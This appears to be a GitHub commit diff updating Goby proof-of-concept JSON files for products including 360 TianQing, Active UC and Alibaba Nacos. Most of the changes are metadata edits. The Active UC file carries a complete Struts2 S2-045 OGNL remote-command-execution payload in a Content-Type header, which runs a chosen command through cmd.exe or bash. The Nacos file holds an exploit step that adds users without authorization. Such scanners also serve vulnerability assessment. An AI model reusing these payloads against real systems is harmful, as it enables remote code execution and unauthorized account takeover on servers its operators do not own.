Skip to content

Commit f8382bb

Browse files
hktalenthktalent
committed
up lib/goby 2022-09-02
1 parent bd73133 commit f8382bb

File tree

370 files changed

+2054
-2135
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

370 files changed

+2054
-2135
lines changed

lib/goby/goby_pocs/360_TianQing_ccid_SQL_injectable.json

100755100644
Lines changed: 12 additions & 55 deletions
Original file line numberDiff line numberDiff line change
@@ -1,31 +1,25 @@
11
{
22
"Name": "360 TianQing ccid SQL injectable",
33
"Level": "2",
4-
"Tags": [
5-
"sqli"
6-
],
4+
"Tags": [],
75
"GobyQuery": "app=\"360-TianQing\"",
8-
"Description": "",
6+
"Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
97
"Product": "360 TianQing",
10-
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
11-
"Author": "",
12-
"Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.",
13-
"Recommendation": "update",
14-
"References": [],
15-
"HasExp": true,
16-
"ExpParams": null,
17-
"ExpTips": {
18-
"Type": "",
19-
"Content": ""
20-
},
8+
"Homepage": "htp://360.cn",
9+
"Author": "PeiQi",
10+
"Impact": "<p>The attacker can get the server permission by injecting SQL into the upload Trojan<br></p>",
11+
"Recommandation": "",
12+
"References": [
13+
"http://wiki.peiqi.tech"
14+
],
2115
"ScanSteps": [
2216
"AND",
2317
{
2418
"Request": {
2519
"method": "GET",
2620
"uri": "/api/dp/rptsvcsyncpoint?ccid=1",
2721
"follow_redirect": true,
28-
"header": null,
22+
"header": {},
2923
"data_type": "text",
3024
"data": ""
3125
},
@@ -66,43 +60,6 @@
6660
"SetVariable": []
6761
}
6862
],
69-
"ExploitSteps": [
70-
"AND",
71-
{
72-
"Request": {
73-
"method": "GET",
74-
"uri": "/test.php",
75-
"follow_redirect": true,
76-
"header": null,
77-
"data_type": "text",
78-
"data": "",
79-
"set_variable": []
80-
},
81-
"ResponseTest": {
82-
"type": "group",
83-
"operation": "AND",
84-
"checks": [
85-
{
86-
"type": "item",
87-
"variable": "$code",
88-
"operation": "==",
89-
"value": "200",
90-
"bz": ""
91-
},
92-
{
93-
"type": "item",
94-
"variable": "$body",
95-
"operation": "contains",
96-
"value": "test",
97-
"bz": ""
98-
}
99-
]
100-
},
101-
"SetVariable": [
102-
"output|lastbody|regex|"
103-
]
104-
}
105-
],
106-
"PostTime": "0000-00-00 00:00:00",
107-
"GobyVersion": "0.0.0"
63+
"PostTime": "2021-04-09 08:51:50",
64+
"GobyVersion": "1.8.255"
10865
}

lib/goby/goby_pocs/360_Tianqing_database_information_disclosure.json

100755100644
Lines changed: 13 additions & 54 deletions
Original file line numberDiff line numberDiff line change
@@ -1,31 +1,27 @@
11
{
2-
"Name": "360 TianQing database information disclosure",
2+
"Name": "360 Tianqing database information disclosure",
33
"Level": "0",
44
"Tags": [
55
"Disclosure of Sensitive Information"
66
],
77
"GobyQuery": "app=\"360-TianQing\"",
8-
"Description": "",
9-
"Product": "360 TianQing",
10-
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
11-
"Author": "",
12-
"Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
13-
"Recommendation": "update",
14-
"References": [],
15-
"HasExp": true,
16-
"ExpParams": null,
17-
"ExpTips": {
18-
"Type": "",
19-
"Content": ""
20-
},
8+
"Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information",
9+
"Product": "360 Tianqing",
10+
"Homepage": "https://www.360.cn/",
11+
"Author": "PeiQi",
12+
"Impact": "",
13+
"Recommandation": "<p>undefined</p>",
14+
"References": [
15+
"http://wiki.peiqi.tech"
16+
],
2117
"ScanSteps": [
2218
"AND",
2319
{
2420
"Request": {
2521
"method": "GET",
2622
"uri": "/api/dbstat/gettablessize",
2723
"follow_redirect": false,
28-
"header": null,
24+
"header": {},
2925
"data_type": "text",
3026
"data": ""
3127
},
@@ -66,43 +62,6 @@
6662
"SetVariable": []
6763
}
6864
],
69-
"ExploitSteps": [
70-
"AND",
71-
{
72-
"Request": {
73-
"method": "GET",
74-
"uri": "/test.php",
75-
"follow_redirect": true,
76-
"header": null,
77-
"data_type": "text",
78-
"data": "",
79-
"set_variable": []
80-
},
81-
"ResponseTest": {
82-
"type": "group",
83-
"operation": "AND",
84-
"checks": [
85-
{
86-
"type": "item",
87-
"variable": "$code",
88-
"operation": "==",
89-
"value": "200",
90-
"bz": ""
91-
},
92-
{
93-
"type": "item",
94-
"variable": "$body",
95-
"operation": "contains",
96-
"value": "test",
97-
"bz": ""
98-
}
99-
]
100-
},
101-
"SetVariable": [
102-
"output|lastbody|regex|"
103-
]
104-
}
105-
],
106-
"PostTime": "0000-00-00 00:00:00",
107-
"GobyVersion": "0.0.0"
65+
"PostTime": "2021-04-08 16:04:28",
66+
"GobyVersion": "1.8.255"
10867
}

lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE-2021-40539.json

100755100644
File mode changed.

lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE_2021_40539.json

100755100644
File mode changed.

lib/goby/goby_pocs/AVCON6_org_execl_download.action_file_down.json

100755100644
File mode changed.

lib/goby/goby_pocs/Active_UC_index.action_RCE.json

100755100644
Lines changed: 26 additions & 27 deletions
Original file line numberDiff line numberDiff line change
@@ -1,29 +1,28 @@
11
{
2-
"Name": "Active UC index.action RCE",
2+
"Name": "Active UC index.action 远程命令执行漏洞",
33
"Level": "3",
44
"Tags": [
55
"RCE"
66
],
77
"GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
8-
"Description": "",
9-
"Product": "Active UC",
10-
"Homepage": "http://www.iactive.com.cn/",
11-
"Author": "",
12-
"Impact": "Active UC index.action has a RCE vulnerability.",
13-
"Recommendation": "update",
14-
"References": [],
15-
"HasExp": true,
16-
"ExpParams": [
17-
{
18-
"Name": "cmd",
19-
"Type": "input",
20-
"Value": "whoami"
21-
}
8+
"Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
9+
"Product": "网动统一通信平台(Active UC)",
10+
"Homepage": "https://gobies.org/",
11+
"Author": "luckying",
12+
"Impact": "",
13+
"Recommandation": "",
14+
"References": [
15+
"https://gobies.org/"
2216
],
23-
"ExpTips": {
24-
"Type": "",
25-
"Content": ""
26-
},
17+
"HasExp": true,
18+
"ExpParams": [
19+
{
20+
"name": "Cmd",
21+
"type": "input",
22+
"value": "whoami",
23+
"show": ""
24+
}
25+
],
2726
"ScanSteps": [
2827
"AND",
2928
{
@@ -42,7 +41,7 @@
4241
"Pragma": "no-cache"
4342
},
4443
"data_type": "text",
45-
"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
44+
"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
4645
},
4746
"ResponseTest": {
4847
"type": "group",
@@ -60,7 +59,7 @@
6059
"SetVariable": []
6160
}
6261
],
63-
"ExploitSteps": [
62+
"ExploitSteps": [
6463
"AND",
6564
{
6665
"Request": {
@@ -73,12 +72,12 @@
7372
"Connection": "close",
7473
"Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
7574
"Charsert": "UTF-8",
76-
"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
75+
"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
7776
"Cache-Control": "no-cache",
7877
"Pragma": "no-cache"
7978
},
8079
"data_type": "text",
81-
"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
80+
"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
8281
},
8382
"ResponseTest": {
8483
"type": "group",
@@ -94,10 +93,10 @@
9493
]
9594
},
9695
"SetVariable": [
97-
"output|lastbody|undefined|undefined"
98-
]
96+
"output|lastbody"
97+
]
9998
}
10099
],
101-
"PostTime": "0000-00-00 00:00:00",
102-
"GobyVersion": "0.0.0"
100+
"PostTime": "2021-06-28 10:08:54",
101+
"GobyVersion": "1.8.268"
103102
}

lib/goby/goby_pocs/Adobe_ColdFusion_LFI_CVE-2010-2861.json

100755100644
File mode changed.

lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leak.json

100755100644
File mode changed.

lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json

100755100644
File mode changed.

lib/goby/goby_pocs/Alibaba Nacos 控制台默认弱口令.json

100755100644
File mode changed.

lib/goby/goby_pocs/Alibaba Nacos 未授权访问漏洞.json

100755100644
File mode changed.

lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json

100755100644
Lines changed: 35 additions & 34 deletions
Original file line numberDiff line numberDiff line change
@@ -2,38 +2,39 @@
22
"Name": "Alibaba Nacos Add user not authorized",
33
"Level": "2",
44
"Tags": [
5-
"unauthorized"
5+
"Ultra vires"
66
],
7-
"GobyQuery": "title=\"Nacos\"",
8-
"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
7+
"GobyQuery": "title==\"Nacos\"",
8+
"Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
99
"Product": "Alibaba Nacos",
1010
"Homepage": "https://github.com/alibaba/nacos",
11-
"Author": "",
12-
"Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
13-
"Recommendation": "update",
14-
"References": [],
15-
"HasExp": true,
16-
"ExpParams": [
17-
{
18-
"Name": "User",
19-
"Type": "input",
20-
"Value": "test"
21-
},
22-
{
23-
"Name": "Pass",
24-
"Type": "input",
25-
"Value": "test"
26-
},
27-
{
28-
"Name": "Dir",
29-
"Type": "select",
30-
"Value": "/v1/auth/users,/nacos/v1/auth/users"
31-
}
11+
"Author": "PeiQi",
12+
"Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
13+
"Recommandation": "<p>Upgrade version<br></p>",
14+
"References": [
15+
"http://wiki.peiqi.tech"
3216
],
33-
"ExpTips": {
34-
"Type": "",
35-
"Content": ""
36-
},
17+
"HasExp": true,
18+
"ExpParams": [
19+
{
20+
"name": "User",
21+
"type": "input",
22+
"value": "PeiQi",
23+
"show": ""
24+
},
25+
{
26+
"name": "Pass",
27+
"type": "input",
28+
"value": "PeiQi",
29+
"show": ""
30+
},
31+
{
32+
"name": "Dir",
33+
"type": "select",
34+
"value": "/v1/auth/users,/nacos/v1/auth/users",
35+
"show": ""
36+
}
37+
],
3738
"ScanSteps": [
3839
"OR",
3940
{
@@ -89,7 +90,7 @@
8990
"SetVariable": []
9091
}
9192
],
92-
"ExploitSteps": [
93+
"ExploitSteps": [
9394
"AND",
9495
{
9596
"Request": {
@@ -102,7 +103,7 @@
102103
"data_type": "text",
103104
"data": "username={{{User}}}&password={{{Pass}}}"
104105
},
105-
"ResponseTest": {
106+
"ResponseTest": {
106107
"type": "group",
107108
"operation": "AND",
108109
"checks": [
@@ -116,10 +117,10 @@
116117
]
117118
},
118119
"SetVariable": [
119-
"output|lastbody|undefined|undefined"
120-
]
120+
"output|lastbody"
121+
]
121122
}
122123
],
123-
"PostTime": "0000-00-00 00:00:00",
124-
"GobyVersion": "0.0.0"
124+
"PostTime": "2021-04-04 19:56:49",
125+
"GobyVersion": "1.8.255"
125126
}

0 commit comments

Comments
 (0)